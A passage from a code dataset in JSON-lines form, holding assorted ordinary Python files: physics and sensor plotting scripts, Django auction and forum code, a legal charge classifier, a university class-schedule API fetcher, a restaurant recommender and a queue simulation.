j.split('-')[0]).group()):\n # max_values_340_2.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # else:\n # max_values_340.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # previous = j\n # else:\n max_values_340.append(1 / data.iloc[data.idxmax()['filtered'] + 1, 2])\n\n max_value = data.max()['filtered']\n id_max_value = data.idxmax()['filtered']\n\nprint(data)\nprint(max_value, id_max_value)\nprint(max_values_RT)\nprint(max_values_320)\nprint(max_values_340)\n# print(max_values_RT_2)\n# print(max_values_320_2)\n# print(max_values_340_2)\n\n\n\nx = [i for i in range(5, 21)]\nprint(x)\n\np_RT = np.poly1d(np.polyfit(x, max_values_RT, 1))\np_320 = np.poly1d(np.polyfit(x, max_values_320, 1))\np_340 = np.poly1d(np.polyfit(x, max_values_340, 1))\n\nfig1, ax = plt.subplots()\nax.plot(x, max_values_RT, 'o', label='RT', color='green')\nax.plot(x, p_RT(x), '-', label='RT', color='green')\nax.plot(x, max_values_320, 'o', label='320 K', color='orange')\nax.plot(x, p_320(x), '-', label='320 K', color='orange')\nax.plot(x, max_values_340, 'o', label='340 K', color='red')\nax.plot(x, p_340(x), '-', label='340 K', color='red')\nax.set_xlabel('Energy, [eV]')\nax.set_ylabel('1/Time, [s]')\nax.legend()\n\n# fig2, ax1 = plt.subplots()\n# ax1.plot(x, max_values_RT, 'o-', color='green', label='1st')\n# ax1.plot(x[5:], max_values_RT_2, 'o-', color='lime', label='2nd')\n# ax1.set_xlabel('Energy, [eV]')\n# ax1.set_ylabel('Time, [s]')\n# ax1.set_title('Room temperature')\n# ax1.legend()\n#\n# fig3, ax2 = plt.subplots()\n# ax2.plot(x, max_values_320, 'o-', color='orange', label='1st')\n# ax2.plot(x[5:], max_values_320_2, 'o-', color='wheat', label='2nd')\n# ax2.set_xlabel('Energy, [eV]')\n# ax2.set_ylabel('Time, [s]')\n# ax2.set_title('320 K')\n# ax2.legend()\n#\n# fig4, ax3 = plt.subplots()\n# ax3.plot(x, max_values_340, 'o-', color='red', label='1st')\n# ax3.plot(x[5:], max_values_340_2, 'o-', color='mistyrose', label='2nd')\n# ax3.set_xlabel('Energy, [eV]')\n# ax3.set_ylabel('Time, [s]')\n# ax3.set_title('340 K')\n# ax3.legend()\n\nplt.show()","sub_path":"Original_Phase_Rate.py","file_name":"Original_Phase_Rate.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"156218182","text":"import sys\nimport unittest\n\nsys.path.append('.') # for units tests\nfrom src.hello import hello\n\n\nclass TestHello(unittest.TestCase):\n def test_type(self):\n output = hello.hello()\n self.assertIsInstance(output, str, 'Wrong type!')\n\n def test_content(self):\n greetings = 'Hello'\n subject = 'World'\n output = hello.hello()\n self.assertIn(greetings, output, 'You should Say Hello!')\n self.assertIn(subject, output, 'Say Hello to the World!')\n\n def test_grammar(self):\n output = hello.hello()\n self.assertIn('!', output, \"Use '!' in Greetings!\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_hello.py","file_name":"test_hello.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"360283040","text":"from django.shortcuts import render, get_object_or_404, reverse, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.utils.timezone import utc\nfrom .models import Auction, Bid\nfrom paintings.models import Painting\nfrom .forms import AuctionForm, BidForm\nimport datetime\nfrom django.core.exceptions import ValidationError\nfrom .scheduler import declare_winner\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom django.http import JsonResponse\nfrom django.core import serializers\n\n# Create your views here.\n\n@login_required\ndef start_auction_view(request):\n\n if request.POST:\n\n auction_form = AuctionForm(request.POST, request=request)\n if auction_form.is_valid():\n auction = auction_form.save(commit=False)\n auction.seller = request.user\n auction.start_date = datetime.datetime.utcnow().replace(tzinfo=utc)\n end_date = auction.start_date + auction.duration\n scheduler = BackgroundScheduler()\n scheduler.add_job(declare_winner, 'date', run_date=end_date, args=[request,auction])\n scheduler.start()\n auction.save()\n messages.success(request,'An auction for your painting has been successfully created.')\n return redirect(reverse('index'))\n else:\n messages.error(request,\"We couldn't create an auction for this painting.\")\n else:\n auction_form = AuctionForm(request=request)\n\n return render (request, 'start_auction.html', {'auction_form' : auction_form})\n\ndef list_auctions_view(request, id=None):\n\n context = {}\n auctions_list = Auction.objects.all()\n context['auctions'] = auctions_list\n context['id'] = id\n \n return render(request, 'auctions_list.html', context)\n\ndef detail_auction_view(request, id=None):\n auction = get_object_or_404(Auction, id=id)\n bid_form = BidForm(auction=auction) \n return render(request, 'auction_detail.html', {'auction': auction, 'bid_form': bid_form, 'message': 'You have successfully placed a bid.'})\n\ndef place_bid(request, id=None):\n auction = get_object_or_404(Auction, id=id)\n if request.is_ajax and request.POST:\n bid_form = BidForm(request.POST, auction=auction)\n if bid_form.is_valid():\n bid = bid_form.save(commit=False)\n bid.bidder = request.user\n bid.auction = auction\n bid.save()\n current_price = bid.auction.current_price\n\n ser_bid = serializers.serialize('json', [bid, ])\n return JsonResponse({'bid': ser_bid, 'current_price':current_price}, status=200)\n else:\n return JsonResponse({\"error\": bid_form.errors}, status=400)\n return JsonResponse({\"error\": \"error\"}, status=400)","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"435910037","text":"from django.urls import path\nfrom forum.views import HomeView\nfrom forum import views\n\nurlpatterns= [\n \n path('', HomeView.as_view(), name=\"forum\"),\n path('rev', views.rev, name=\"rev\"),\n path('rev/edit/', views.rev_update, name='rev_update'),\n path('about', views.about, name=\"about\"),\n path('filter/', views.fil, name='identity'),\n path('category/', views.cate,name=\"cate\"),\n]","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"599691854","text":"from vpython import *\r\n\r\ng = 9.8\r\nsize, m = 0.05, 0.5\r\nL, k = 2, 15000\r\nangle = pi/6\r\nomega = 2*pi/86400\r\nlatitude = 23.5*pi/180\r\nc = 20 \r\n'''\r\nin order to accelerate the procedure of Foucault pendulum, i add a prameter 'c', which means \r\n'time magnification factor', it also means that I accelerate the speed of rotation 'c' times\r\nfaster.\r\n''' \r\n\r\nscene = canvas(width=500, height=500, center=vec(0, -1, 0), background=vec(0.5, 0.5, 0))\r\nceiling = box(length=0.8, height=0.005, width=0.8, color=color.blue)\r\nball = sphere(radius=size, color=color.red, make_trail=True, trail_type=\"points\",\r\n interval=20, trail_radius = 0.1*size)\r\nspring = cylinder(radius=0.01) # default pos = vec(0, 0, 0)\r\nball.v = vec(0.00001, 0, 0)\r\nball.pos = vec(-sin(angle)*L, -cos(angle)*L, 0)\r\nx_axis = vec(1,0,0)\r\n\r\nslab = label(pos=vec(0.4,-1.2,0), box = True)\r\nmlab = label(pos=vec(0.2,-1.2,0), box = True)\r\nhlab = label(pos=vec(0, -1.2,0), box = True)\r\ndlab = label(pos=vec(-0.2, -1.2,0), box = True)\r\ntlab = label(pos=vec(0.1, -1.6,0), box = False, text=str('time magnification factor c: '+str(c)))\r\nplab = label(pos=vec(0.1, -1.4,0), box = True)\r\nrlab = label(pos=vec(0, -2, 0), box = False)\r\n\r\ncount = 0\r\ndt = 0.001\r\nt = 0\r\nperiod = 0\r\nball_v_vec = vec(ball.v.x, 0, ball.v.z)\r\ncenter = vec(0, -cos(angle)*L, 0)\r\npre_x = mag(ball.pos-center)\r\nwhile True:\r\n rate(2000)\r\n t += dt\r\n period += dt\r\n \r\n #use two different variables to store distance from ball to center in three different time\r\n pre_pre_x = pre_x \r\n pre_x = mag(ball.pos - center)\r\n\r\n spring.axis = ball.pos - spring.pos # spring extended from endpoint to ball\r\n spring_force = - k * (mag(spring.axis) - L) * spring.axis.norm() # to get spring force vector\r\n Coriolis_ac = - 2 * cross(vec(0,sin(latitude),-cos(latitude)),ball.v)*omega*c # Coriolis force, c means 'time magnification factor'\r\n ball.a = vector(0, - g, 0) + spring_force / m + Coriolis_ac \r\n ball.v += ball.a*dt \r\n ball.pos += ball.v*dt\r\n ball_v_vec = vec(ball.v.x, 0, ball.v.z)\r\n\r\n cos_angle = abs(dot(x_axis,ball_v_vec))/(mag(x_axis)*mag(ball_v_vec))\r\n if mag(ball.v)>0.5:\r\n deltaangle = acos(cos_angle)*180/pi #claculate the deltaangle\r\n plab.text = str('deltaangle: %2.3f degree'%deltaangle)\r\n if pre_x > mag(ball.pos - center) and pre_x > pre_pre_x:\r\n count += 1\r\n if count == 2*1000/c:\r\n rlab.text = str('deltaangle = %2.4f degree after 1000 periods of pendulum'%deltaangle)\r\n\r\n sec = (t*c//1)%60\r\n mi = (t*c//60)%60\r\n hr = (t*c)//3600%24\r\n day = (t*c)//86400\r\n slab.text = str('%1.0fS'%sec)\r\n mlab.text = str('%1.0fM'%mi)\r\n hlab.text = str('%1.0fH'%hr)\r\n dlab.text = str('%1.0fD'%day)\r\n \r\n","sub_path":"physics_hw/b07901020(4)/optional.py","file_name":"optional.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"533167266","text":"from dataclasses import dataclass\n\nfrom expungeservice.models.charge_types.juvenile_charge import JuvenileCharge\nfrom expungeservice.models.charge_types.felony_class_a import FelonyClassA\nfrom expungeservice.models.charge_types.felony_class_b import FelonyClassB\nfrom expungeservice.models.charge_types.felony_class_c import FelonyClassC\nfrom expungeservice.models.charge_types.traffic_violation import TrafficViolation\nfrom expungeservice.models.charge_types.traffic_non_violation import TrafficNonViolation\nfrom expungeservice.models.charge_types.duii import Duii\nfrom expungeservice.models.charge_types.subsection_6 import Subsection6\nfrom expungeservice.models.charge_types.marijuana_ineligible import MarijuanaIneligible\nfrom expungeservice.models.charge_types.misdemeanor import Misdemeanor\nfrom expungeservice.models.charge_types.violation import Violation\nfrom expungeservice.models.charge_types.parking_ticket import ParkingTicket\nfrom expungeservice.models.charge_types.person_felony import PersonFelonyClassB\nfrom expungeservice.models.charge_types.schedule_1_p_c_s import Schedule1PCS\nfrom expungeservice.models.charge_types.civil_offense import CivilOffense\nfrom expungeservice.models.charge_types.unclassified_charge import UnclassifiedCharge\nfrom expungeservice.models.charge_types.sex_crimes import SexCrime\n\n\n@dataclass\nclass ChargeClassifier:\n violation_type: str\n name: str\n statute: str\n level: str\n chapter: str\n section: str\n\n def classify(self):\n def classification_found(c):\n return c is not None\n\n for c in self.__classifications_list():\n if classification_found(c):\n return c\n\n def __classifications_list(self):\n yield ChargeClassifier._juvenile_charge(self.violation_type)\n yield ChargeClassifier._traffic_crime(self.statute, self.level)\n yield from ChargeClassifier._classification_by_statute(self.statute, self.chapter, self.section, self.level)\n yield ChargeClassifier._parking_ticket(self.violation_type)\n yield from ChargeClassifier._classification_by_level(self.level, self.statute)\n yield ChargeClassifier._civil_offense(self.statute, self.chapter, self.name)\n\n yield UnclassifiedCharge\n\n @staticmethod\n def _juvenile_charge(violation_type):\n if \"juvenile\" in violation_type.lower():\n return JuvenileCharge\n\n @staticmethod\n def _classification_by_statute(statute, chapter, section, level):\n yield ChargeClassifier._marijuana_ineligible(statute, section)\n yield ChargeClassifier._subsection_6(section, level)\n yield ChargeClassifier._schedule_1_pcs(section)\n yield ChargeClassifier._sex_crime(statute)\n\n @staticmethod\n def _classification_by_level(level, statute):\n yield ChargeClassifier._non_traffic_violation(level)\n yield ChargeClassifier._misdemeanor(level)\n yield ChargeClassifier._felony_class_c(level)\n yield ChargeClassifier._felony_class_b(level, statute)\n yield ChargeClassifier._felony_class_a(level)\n\n @staticmethod\n def _marijuana_ineligible(statute, section):\n ineligible_statutes = [\"475B359\", \"475B367\", \"475B371\", \"167262\"]\n if statute == \"475B3493C\" or section in ineligible_statutes:\n return MarijuanaIneligible\n\n @staticmethod\n def _subsection_6(section, level):\n conditionally_ineligible_statutes = [\n \"163200\", # (Criminal mistreatment in the second degree) if the victim at the time of the crime was 65 years of age or older.\n \"163205\", # (Criminal mistreatment in the first degree) if the victim at the time of the crime was 65 years of age or older, or when the offense constitutes child abuse as defined in ORS 419B.005 (Definitions).\n \"163575\", # (Endangering the welfare of a minor) (1)(a), when the offense constitutes child abuse as defined in ORS 419B.005 (Definitions).\n \"163145\", # (Criminally negligent homicide), when that offense was punishable as a Class C felony.\n \"163165\", # ( ineligible if under subection(1)(h) ; Assault in the third degree of a minor 10 years or younger)\n ]\n if section in conditionally_ineligible_statutes:\n return Subsection6\n\n @staticmethod\n def _traffic_crime(statute, level):\n\n chapter = statute[:3]\n if chapter.isdigit():\n statute_range = range(801, 826)\n\n chapter_num = int(chapter)\n\n if chapter_num == 813:\n return Duii\n\n elif chapter_num in statute_range:\n level_str = level.lower()\n if \"felony\" in level_str or \"misdemeanor\" in level_str:\n return TrafficNonViolation\n else:\n return TrafficViolation\n\n @staticmethod\n def _civil_offense(statute, chapter, name):\n statute_range = range(1, 100)\n if chapter:\n if chapter.isdigit() and int(chapter) in statute_range:\n return CivilOffense\n elif statute.isdigit() and int(statute) in statute_range:\n return CivilOffense\n elif \"fugitive complaint\" in name.lower():\n return CivilOffense\n\n @staticmethod\n def _schedule_1_pcs(section):\n if section in [\"475854\", \"475874\", \"475884\", \"475894\", \"475992\"]:\n return Schedule1PCS\n\n @staticmethod\n def _parking_ticket(violation_type):\n if \"parking\" in violation_type.lower():\n return ParkingTicket\n\n @staticmethod\n def _non_traffic_violation(level):\n if \"Violation\" in level:\n return Violation\n\n @staticmethod\n def _misdemeanor(level):\n if \"Misdemeanor\" in level:\n return Misdemeanor\n\n @staticmethod\n def _felony_class_c(level):\n if level == \"Felony Class C\":\n return FelonyClassC\n\n @staticmethod\n def _felony_class_b(level, statute):\n if level == \"Felony Class B\":\n if ChargeClassifier._person_felony(statute):\n return PersonFelonyClassB\n else:\n return FelonyClassB\n\n @staticmethod\n def _felony_class_a(level):\n if level == \"Felony Class A\":\n return FelonyClassA\n\n @staticmethod\n def _person_felony(statute):\n \"\"\"\n The statutes listed here are specified in https://secure.sos.state.or.us/oard/displayDivisionRules.action?selectedDivision=712\n The list includes statutes which are not named as class B felonies. However, because a statute can be charged as a different level of crime from that named in the statute, our expunger checks OECI directly for whether the charge was a class B felony, and then checks membership in this list.\n \"\"\"\n if statute in PersonFelonyClassB.statutes + PersonFelonyClassB.statutes_with_subsection:\n return True\n elif statute in [full_statute[:6] for full_statute in PersonFelonyClassB.statutes_with_subsection]:\n return True\n # In this case the type eligibility needs more analysis. The condition is checked again in the charge object's type eligibility method.\n else:\n return False\n\n @staticmethod\n def _sex_crime(statute):\n if statute in SexCrime.statutes + SexCrime.romeo_and_juliet_exceptions:\n return SexCrime\n","sub_path":"src/backend/expungeservice/models/helpers/charge_classifier.py","file_name":"charge_classifier.py","file_ext":"py","file_size_in_byte":7363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"429992842","text":"'''\nEste script grafica series temporales\n\nSource de https://scipy.github.io/old-wiki/pages/Cookbook/Matplotlib/LaTeX_Examples.html\n'''\n\nimport pylab\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ngolden_mean = (math.sqrt(5)-1.0)/2.0 # Aesthetic ratio\nfig_width = 3+3/8 \t\t\t # width in inches\nfig_height = fig_width*golden_mean # height in inches\nfig_size = [fig_width,fig_height]\n\nparams = {'backend': 'ps',\n 'axes.titlesize': 8,\n 'axes.labelsize': 9,\n 'axes.linewidth': 0.5, \n 'axes.grid': True,\n 'axes.labelweight': 'normal', \n 'font.family': 'serif',\n 'font.size': 8.0,\n 'font.weight': 'normal',\n 'text.color': 'black',\n 'xtick.labelsize': 8,\n 'ytick.labelsize': 8,\n 'text.usetex': True,\n 'legend.fontsize': 8,\n 'figure.dpi': 300,\n 'figure.figsize': fig_size,\n 'savefig.dpi': 300,\n }\n\npylab.rcParams.update(params)\n\n### DATA ###\n\ndata = np.genfromtxt('26062019_tarde.txt', delimiter = '\\t')\ntime = np.linspace(0,len(data[:,0]),len(data[:,0])) \nsensor_1 = data[:,1] \nsensor_2 = data[:,2] \nsensor_3 = data[:,3] \nsensor_4 = data[:,4]\n\n### PLOT ###\n\n### Sensor 1 ###\nplt.plot(time,sensor_1,color='green',linewidth='0.5',label='sensor 1') \n\n### Sensor 2 ###\nplt.plot(time,sensor_2,color='orange',linewidth='0.5',label='sensor 2') \n\n### Sensor 3 ###\nplt.plot(time,sensor_3,color='blue',linewidth='0.5',label='sensor 3') \n\n### Sensor 4 ###\n#plt.plot(time,sensor_4,color='sienna',linewidth='0.5',label='sensor 4') \n\npylab.grid(False)\npylab.xlabel('time')\npylab.ylabel('tension~(mV)')\npylab.ylim(0, 1000)\nlgd=plt.legend(numpoints=1,handlelength=0.8) \nplt.legend(frameon=False,loc='best',labelspacing=-0.1,borderpad=0.3,handletextpad=0.5,fontsize=6,numpoints=1) \n\npylab.savefig('v_vs_t_sensor_2606_tarde_p.png', format='png', dpi=300, bbox_inches='tight')","sub_path":"analisis/260619/plot_v_vs_t.py","file_name":"plot_v_vs_t.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"300844512","text":"import requests\nimport pprint\nimport json\nimport re\nimport datetime\n\npp = pprint.PrettyPrinter(indent = 2)\n\ndef trim_spaces(l):\n '''Trim white spaces in a list of text elements'''\n return [' '.join(e.split()) for e in l]\n \ndef get_sections(dept, term_id, page_number, page_size, exclude):\n '''Get classes/sections from class API (one page at a time)'''\n base_url = 'https://apis.berkeley.edu/sis/v1/classes/sections'\n url = '{}?term-id={}&subject-area-code={}&print-in-schedule=true&page-number={}&page-size={}'.format(base_url, term_id, dept, page_number, page_size)\n #pp.pprint(url)\n # API ID and Key\n with open('config/api_keys.json', 'r') as f:\n api_keys = json.load(f)\n app_id = api_keys['class_app_id']\n app_key = api_keys['class_app_key']\n headers = {'accept': 'application/json', 'app_id': app_id, 'app_key': app_key}\n #pp.pprint(headers)\n response = requests.get(url, headers = headers)\n #pp.pprint(response.json())\n if response.status_code == requests.codes.ok and 'classSections' in response.json()['apiResponse']['response']:\n return response.json()['apiResponse']['response']['classSections']\n else:\n return []\n\ndef get_all_sections(dept, term_id, number_of_pages, page_size, exclude):\n '''Get all sections in output format compatible with Math website'''\n sections = []\n for i in range(number_of_pages):\n page_number = i + 1\n sections = sections + get_sections(dept, term_id, page_number, page_size, exclude)\n exclude_list = exclude.split(',')\n classes = []\n course_headers = ('Department', 'Number', 'Title')\n section_headers = ('Primary', 'Class', 'Number', 'Type', 'Days/Times', 'Location', 'Instructor', 'Status', 'Session', 'Sort Key')\n for s in sections:\n if not s['printInScheduleOfClasses']:\n # drop non-printable sections\n continue\n course_info = dict(zip(course_headers, get_course_info(s)))\n section_info = dict(zip(section_headers, get_section_info(s)))\n if section_info['Type'] in exclude_list:\n # drop sections from exclude list\n continue\n #print(s['class']['course']['displayName'], s['component']['code'], s['number'], s['id'])\n #print(course_info['Department'], course_info['Number'], section_info['Type'], section_info['Number'], section_info['Class'])\n classes += [{'Course': course_info, 'Section': section_info}]\n return classes\n\ndef get_course_info(section):\n '''Get course information from raw section format'''\n dept = section['class']['course']['subjectArea']['code']\n course_num = section['class']['course']['catalogNumber']['formatted']\n course_title = section['class']['course']['title']\n return (dept, course_num, course_title)\n\ndef get_section_info(section):\n '''Get section infomation from raw section format'''\n primary = section['association']['primary']\n class_num = section['id']\n section_num = section['number']\n section_type = section['component']['code']\n days = ''\n if 'meetings' in section.keys() and \\\n 'meetsDays' in section['meetings'][0].keys():\n days = section['meetings'][0]['meetsDays']\n times = ''\n if 'meetings' in section.keys() and \\\n 'startTime' in section['meetings'][0].keys() and \\\n 'endTime' in section['meetings'][0].keys():\n # convert 24 hour to 12 hour time\n t = datetime.datetime.strptime(section['meetings'][0]['startTime'], '%H:%M:%S')\n start_time = t.strftime('%I:%M%p')\n t = datetime.datetime.strptime(section['meetings'][0]['endTime'], '%H:%M:%S')\n end_time = t.strftime('%I:%M%p')\n times = '{:5s} - {:5s}'.format(start_time, end_time)\n days_times = ('{} {}'.format(days, times)).strip()\n #if days_times:\n #print(days_times)\n location = ''\n if 'meetings' in section.keys() and \\\n 'location' in section['meetings'][0].keys() and \\\n 'description' in section['meetings'][0]['location'].keys():\n location = section['meetings'][0]['location']['description']\n #print(location)\n instructor = ''\n if 'meetings' in section.keys() and \\\n 'assignedInstructors' in section['meetings'][0].keys():\n names = []\n for e in section['meetings'][0]['assignedInstructors']:\n if e['printInScheduleOfClasses'] and \\\n 'instructor' in e.keys() and \\\n 'names' in e['instructor'].keys() and \\\n 'formattedName' in e['instructor']['names'][0].keys():\n name = e['instructor']['names'][0]['formattedName']\n #print(name)\n names += [name]\n instructor = '\\n'.join(trim_spaces(names))\n if 'enrollmentStatus' in section and 'status' in section['enrollmentStatus'] and 'description' in section['enrollmentStatus']['status']:\n status = section['enrollmentStatus']['status']['description']\n else:\n status = 'Unknown'\n term = section['class']['session']['term']['name']\n session_name = section['class']['session']['name']\n start_date = section['startDate']\n start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d').strftime('%B %d')\n end_date = section['endDate']\n end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d').strftime('%B %d')\n if session_name == 'Regular Academic Session':\n session = '{}, {} - {}'.format(term, start_date, end_date)\n else:\n session = '{} {}, {} - {}'.format(term, session_name, start_date, end_date)\n course_num = section['class']['course']['catalogNumber']['formatted']\n sort_key = get_sortkey(course_num, section_num, section_type)\n return (primary, class_num, section_num, section_type, days_times, location, instructor, status, session, sort_key)\n\ndef get_sortkey(course_num, section_num, section_type):\n '''Produce sort key from course number, section number, and section type'''\n r = r'(^\\D?)(\\d+)(\\D*)$'\n m = re.match(r, course_num)\n m1 = m.group(1).rjust(1, ' ')\n m2 = m.group(2).rjust(3, '0')\n m3 = m.group(3).ljust(2, ' ')\n n = section_num\n if section_type == 'DIS' or section_type == 'WBD':\n n = n.rjust(5, '0')\n else:\n n = n.ljust(5, '0')\n return m2 + m3 + m1 + n\n\n\nif __name__ == '__main__':\n '''Get department class schedule for specified term'''\n from optparse import OptionParser\n\n usage = 'usage: %prog options'\n parser = OptionParser(usage)\n parser.add_option('-d', '--dept', dest = 'dept', default = 'MATH',\n help = 'department abbreviation, e.g. MATH')\n parser.add_option('-t', '--term', dest = 'term_id', default = '2232',\n help = 'term id, e.g. 2232')\n parser.add_option('-p', '--number-of-pages', type = 'int', dest = 'number_of_pages', default = 10,\n help = 'number of pages, e.g. 10 (default 10)')\n parser.add_option('-s', '--page-size', type = 'int', dest = 'page_size', default = 100,\n help = 'page number, e.g. 100 (default maximum 100)')\n parser.add_option('-e', '--exclude', dest = 'exclude', default = 'IND,COL',\n help = 'comma separated section types to be excluded from search results, default \"IND,COL\"')\n parser.add_option('-o', '--output', dest = 'output', default = 'sections.json',\n help = 'name of output file (in json format)')\n (options, args) = parser.parse_args()\n # get arguments\n dept = options.dept\n term_id = options.term_id\n number_of_pages = options.number_of_pages\n page_size = options.page_size\n exclude = options.exclude\n output = options.output\n # get matching sections\n sections = get_all_sections(dept, term_id, number_of_pages, page_size, exclude)\n if sections and len(sections) > 0:\n print('{} class(es) found (see output in {})'.format(len(sections), output))\n with open(output, 'w') as f:\n json.dump(sections, f, sort_keys = True, indent = 2)\n else:\n print('no classes found (no output)')\n","sub_path":"get_schedule.py","file_name":"get_schedule.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"636665173","text":"# page1 & a little page2\n'''\n博文要注意的地方:可以control F,打自己的名字來查\n前端要注意的地方:可以control F,打「前端」來查\n'''\n\nimport csv\n\ndef choose_style_sorted(choose_style): # 為了演算法而讓每個類型有個分數\n list_style = choose_style.split(',')\n list_sequence_point = []\n list_tmp = []\n count = 99\n for style in list_style:\n list_tmp = []\n list_tmp.append(style)\n list_tmp.append(count)\n count -= 1\n list_sequence_point.append(list_tmp)\n\n return list_sequence_point # [[韓式, 99],[日式, 98],.....]\n\ndef recommendation(restaurant_dict):\n preference = input() # 方案ㄧ排序還是方案二排序,這邊a是方案一(星數優先),b是方案二(類型優先)\n if preference == 'planA':\n recommendation_list = sorted(restaurant_dict.items(), key = lambda x: (x[1][3], x[1][4]), reverse = True)\n else:\n recommendation_list = sorted(restaurant_dict.items(), key = lambda x: (x[1][4], x[1][3]), reverse = True)\n\n return recommendation_list\n\n\nclass Restaurant:\n def __init__ (self, name, meal, locate, style, day, name2open, star):\n self.name = name # 餐廳名稱\n self.meal = meal # 早中晚宵\n self.locate = locate # 地點\n self.style = style # 風格(Ex.日式)\n # 博文:新加了兩個\n self.day = day # 輸入之日期\n self.name2open = name2open # 日期對應開放時間的dictionary\n self.star = star\n \n def put_name(self): # call餐廳名稱\n return self.name\n\n def check_meal(self): # 所選時段餐廳有沒有開的布林\n meallist = self.meal.split(', ') # 預設為字串,前端用list設定選擇時段的話:可刪!!\n cnt = 0\n for meal in meallist:\n cnt += 1\n if meal in choose_meal:\n return True # 選擇的任一時段餐廳有開的話即回傳True\n break\n if cnt == len(meallist):\n return False\n\n def check_locate(self): # 選擇地點並讓其回傳布林\n if self.locate in choose_locate:\n return True\n else:\n return False\n \n def check_day(self): # 回傳選擇的日期有沒有開的布林\n cnt = 0\n weeklist = ['MON','TUE','WED','THU','FRI','SAT','SUN']\n if self.name2open[self.name][weeklist.index(self.day)]== '':\n return False\n else:\n return True\n\n def check_style(self): # 選擇風格並回傳布林\n if self.style in choose_style:\n return True\n else:\n return False\n\nwith open('canteen.csv', 'r', encoding='utf-8') as f: # 讀csv檔\n # 製作各種字典(除星期),之後可能會用到\n reader = csv.reader(f)\n name2locate = dict()\n name2meal = dict()\n name2style = dict()\n name2phone = dict()\n name2address = dict()\n name2stars = dict() # 博文注意,多加了:星星的字典 在這!!\n\n # 前端注意!!請將input改成你們botton函數回傳的值\n choose_locate = input() # 目前應輸入string,要輸入list的話請回去把第16行刪掉\n choose_meal = input()\n choose_style = input()\n day = input() # 輸出的日期\n \n restaurant_dict = dict() # 點好後輸出的清單在這!!(博文、前端)\n \n name2open = dict() # 博文、振安:跑check_day的dictionary\n for row in reader: # 跑csv檔的每一行\n row.pop(0)\n # print(row)\n name2locate[row[0]] = row[1]\n name2meal[row[0]] = row[2]\n name2style[row[0]] = row[3]\n name2phone[row[0]] = row[4]\n name2address[row[0]] = row[5]\n name2stars[row[0]] = row[6]\n name2open[row[0]] = [row[8],row[10],row[12],row[14],row[16],row[18],row[20]] # 博文、振安:跑check_day的dictionary\n \n # 要class所需要的值\n name = row[0]\n locate = row[1]\n meal = row[2]\n style = row[3]\n star = row[6]\n res = Restaurant(name, meal, locate, style, day, name2open, star) # 開始使用class Restaurant\n # print(res.check_locate())\n # print(res.check_meal())\n # print(res.check_style())\n # print(res.check_day())\n \n # 用布林篩選輸出的清單\n if res.check_locate() == True:\n if res.check_meal() == True:\n if res.check_day() == True:\n if res.check_style() == True:\n for style_ in choose_style_sorted(choose_style):\n if res.style in style_:\n restaurant_dict[res.name] = [res.locate, res.meal, res.style, res.star, style_[1]] \n\nprint(recommendation(restaurant_dict))\n\n \n\n","sub_path":"p2back.py","file_name":"p2back.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153541749","text":"from django.urls import path,include\n\nfrom .views import index,search\nfrom brands.urls import urlpatterns as brand_urlpatterns\n\nurlpatterns = [\n\n path(\"brands/\",include(\"api.brands.urls\")),\n path(\"products/\",include(\"api.products.urls\")),\n path(\"categories/\",include(\"api.categories.urls\")),\n path(\"subcategories/\",include(\"api.subcategories.urls\")),\n path(\"search\",search,name=\"search\"),\n\n]\n\n\n\n\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"104192249","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2016 Jérémie DECOCK (http://www.jdhp.org)\n\n# See: https://docs.python.org/3/library/time.html#time.process_time\n# http://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python\n\nimport time\n\ninitial_time = time.perf_counter()\n\n#do some stuff\ntime.sleep(1)\n\nfinal_time = time.perf_counter()\n\nelapsed_time = final_time - initial_time\n\nprint(elapsed_time, \"sec\")\n","sub_path":"python/time/perf_counter.py","file_name":"perf_counter.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"249762751","text":"from src.controller import Controller\nfrom src.request import Request\nfrom src.window import Window\nfrom src.globals import *\nfrom src.statistics import *\nimport numpy as np\n\ncustomers = []\nwindows = []\n\n\ndef input_int(msg):\n return int(input(msg))\n\n\ndef input_float(msg):\n return float(input(msg))\n\n\nGlobals.window_number = input_int(\"输入窗口数量: \")\nGlobals.max_queue = input_int(\"输入最大队列长度: \")\nGlobals.max_cus = input_int(\"输入客户总数: \")\nGlobals.mean_arrive_time = input_float(\"输入平均到达时间: \")\nGlobals.mean_serve_time = input_float(\"输入平均服务时间: \")\n\ntimes = 10000\nGlobals.debug = False\n\nfor s in range(0, 1):\n sumA = 0.0\n sumB = 0.0\n sumC = 0.0\n for k in range(0, 